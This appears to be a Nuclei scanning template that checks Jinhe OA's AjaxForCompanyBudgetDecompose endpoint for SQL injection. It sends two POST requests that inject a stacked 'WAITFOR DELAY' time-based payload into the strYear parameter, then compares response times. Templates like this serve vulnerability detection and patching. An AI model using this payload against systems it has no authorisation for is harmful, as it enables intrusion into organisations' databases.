id: jinheOA-AjaxForCompanyBudgetDecompose-sql

info:
  name: 金和OA AjaxForCompanyBudgetDecompose存在SQL注入漏洞
  author: jinheOA
  severity: high
  tags: jinheOA

http:
  - raw:
      - |
        POST /c6/JHSoft.Web.CostControl/Decompose/AjaxForCompanyBudgetDecompose.ashx/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: application/x-www-form-urlencoded

        strType=getBudgetTime&strYear=1;WAITFOR DELAY '0:0:2'--

      - |
        POST /c6/JHSoft.Web.CostControl/Decompose/AjaxForCompanyBudgetDecompose.ashx/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: application/x-www-form-urlencoded

        strType=getBudgetTime&strYear=1;WAITFOR DELAY '0:0:4'--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: dsl
        dsl:
          - 'duration_1>=2 && duration_1<6'  
          - 'duration_2>=4 && duration_2<10'
        condition: and

